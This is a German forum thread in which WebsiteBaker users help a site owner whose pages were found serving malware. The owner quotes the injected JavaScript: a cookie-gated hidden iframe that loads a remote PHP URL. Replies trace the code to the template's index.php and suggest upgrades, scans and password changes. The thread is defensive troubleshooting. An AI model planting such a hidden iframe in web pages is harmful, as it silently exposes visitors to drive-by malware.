[GELÖST]-Trojanermeldung der Schweizer Registrierungsstelle "Switch"

[didge4u]

Hallo Alle,
Ich benutze Websitebaker seit einigen Jahren und habe einige Projekte damit umgesetzt. Eigentlich bin ich ganz zufrieden damit.
Jetzt wurde ich von Switch ermahnt, das auf sich auf eine meiner betreuten Seiten (Version 2.7) ein Trojaner, welcher Malware verbreitet, eingenistet hat. Mir wurde mit der Domainlöschung gedroht.

Glücklicherweise waren die Mitarbeiter kulant und liessen mit sich reden. Mir ist schleierhaft wie sich der folgende Code auf der Seite "einnisten" konnte:

Code:

<script language="JavaScript" type="text/javascript">
 if (document.cookie.search("jhgkz=9") == -1) {
 kwoo=document.getElementById('zgynw');if(kwoo==null){document.write('<iframe id=zgynw
 src=hxxp://outreach.ewu.edu/assets/site/ajax.php style=display:none></iframe>');}
 document.cookie = "jhgkz=9;expires=Sun, 01-Dec-2011 08:00:00 GMT;path=/";}
</script>

Ich weiss nicht, ob ihr ähnliche Erfahrungen mit Verbreitung von Malware hattet. Das würde mich interessieren. Ich vermute, dass der Code über eine Lücke im System eingeschleust wurde.

Gruss aus der Schweiz.

Patrick

[kweitzel]

Grundsätzlich denke ich Dein Hoster sollte Dir dabei helfen. Davon mal abgesehen, wo findet sich denn dieser Code?

Gruß

Klaus

[NorHei]

Bzw., wo befand er sich, ich hoffe er ist nicht mehr da 

[DarkViper]

Wäre schön, wenn Du uns sagen könntest, in welcher Datei der Schadcode eingebaut war.
Des weiteren, die eingestellten Rechte und Besitzverhältnisse auf diese (und auch andere) Dateien.
Weiter ist es wichtig zu wissen, in welchem Modus PHP bei Dir läuft:  apache2modul oder fast/CGI.

Grundsätzlich: Du solltest Deine WB-Version dringendst auf die aktuelle Version upgraden, da die von Dir verwendete Version 2.7 noch jede Menge gravierende Sicherheitsmängel hat.

Zusätzliche Vorbeugemaßnahmen:

• Den eigenen Rechner gründlichst nach Maleware scannen
• Danach auf jeden Fall das FTP-Passwort sowie das Passwort für den WB-Admin ändern
• Den Webspace nach auffällig neuen Dateien(Erstellungs-/Änderungsdatum) durchsuchen und diese Dateien kontrollieren.

[didge4u]

Hallo zusammen
Danke schon mal. Ich werde jetzt mal meinen Provider anfragen.
ich werde auf alle Fälle die ganze Installation neu updaten.

@NorHei und kweitzel: Die Webseite habe ich umgehend lahmgelegt. Der Code befand sich auf jeder einzelnen Seite. Leider habe ich in der Datenbank von WB keinen solchen Code gefunden. Vielleicht wird dieser zur Laufzeit generiert und von irgendwo reinkopiert. Mal schauen was der Provider meint.

Gruss ich werde mich wieder melden.

Patrick

[kweitzel]

Was meinst Du denn mit "jeder einzelnen Seite"? Schau mal ob der Code in den Dateien namens index.php drin ist, das würde ich erwarten und das ist eine "standart" Vorgehensweise bei sowas

Gruß

Klaus

[didge4u]

Hallo zusammen,
Danke kweitzel!
Der Code lag tatsächlich in der datei "index.php" des templates.
Einen Screenshot habe ich angehängt.
Grz Patrick

[kweitzel]

Dann musst Du ja "nur noch" herausbekommen, wie der da hin gekommen ist ... hast Du alle anderen index Dateien auf Deinem Webspace geprüft? "Normalerweise" findet man solchen code in allen.

Gruß

Klaus

[Lomex]

Hallo liebe User-Gemeinde,

auch mein Webspace wurde von diversen Trojanern heimgesucht. Und das nicht zum erstenmal. Also wer glaubt, mit dem bereinigen der index-Dateien ist das Problem gelöst, ist auf dem Holzweg. Betroffen war zuerst eine 2.7.er Version, später auch 2.8.1. Nur ein Update auf 2.8.2 brachte auch nichts. Im Backend waren diverse .js Dateien verseucht.

Zwei andere Webseiten musste ich ganz neu aufsetzen, hält bis jetzt. (2.8.2)

Das ich die Trojaner selbst eingeschleust habe, bestreite ich jetzt mal. Meine Systeme sind sauber. Wenn man nach  "joomla trojaner"googelt, findet man auch diverse Einträge in anderen Foren.

Bei meinem Hoster all-inkl. läuft standardmäßig php 4.4.9 . Mit dem Befehl "AddHandler php53-cgi .php" in der .htaccess Datei schalte ich auf die höhere version. (ist in der FAQ so beschrieben) Kann das eine Sicherheitslücke sein?

Gruß
Lomex

[kweitzel]

Ich glaube eher nicht, dass es mit dem .htaccess Eintrag zu tun hat

Bist Du denn sicher, dass es nur mit Deinem Webspace auf dem Server zu tun hat? Der All-Inkl Support ist in dieser Hinsicht eigentlich sehr auf Zack. Hast Du bei denen mal angefragt?

Wie sieht es denn mit anderen Usern auf der WB Installation oder mit FTP Zugang aus? Was hast Du noch auf dem Webspace laufen?

Forensik ist aus der Ferne unmöglich zu betreiben. Dazu muss man auf die Maschine rauf und dort rumschnüffeln können. Du brauchst die Eigentümerverhältnisse, Zeitstempel, Zugriff aud die Log-Dateien, etc ...

Gruß

Klaus